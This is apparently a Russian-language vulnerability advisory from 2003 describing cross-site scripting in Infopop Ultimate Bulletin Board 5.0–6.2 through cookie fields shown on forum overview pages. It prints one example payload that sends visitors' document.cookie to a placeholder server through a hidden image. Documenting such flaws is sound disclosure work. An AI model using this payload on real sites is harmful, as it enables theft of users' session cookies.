Межсайтовый скриптинг в Ultimate Bulletin Board
| Дата публикации: | 22.07.2003 |
| Всего просмотров: | 1498 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Уязвимость в проверке правильности входных данных обнаружена в
Ultimate Bulletin Board. Удаленный пользователь может выполнить XSS нападения.
Удаленный авторизованный пользователь может внедрить произвольный HTML код в некоторые поля в куки Ultimate Bulletin Board, которые будут отображены в странице краткого обзора или в странице последних сообщений форума. Пример:
username<script>document.write('<img src%3D"http://someserver/savereq.php?'%2Bdocument.cookie%2B'" width%3D0height%3D0>')</script>
Уязвимость обнаружена в Infopop Ultimate Bulletin Board 5.0-6.2 |
| Ссылки: | anti_acid hotmail com |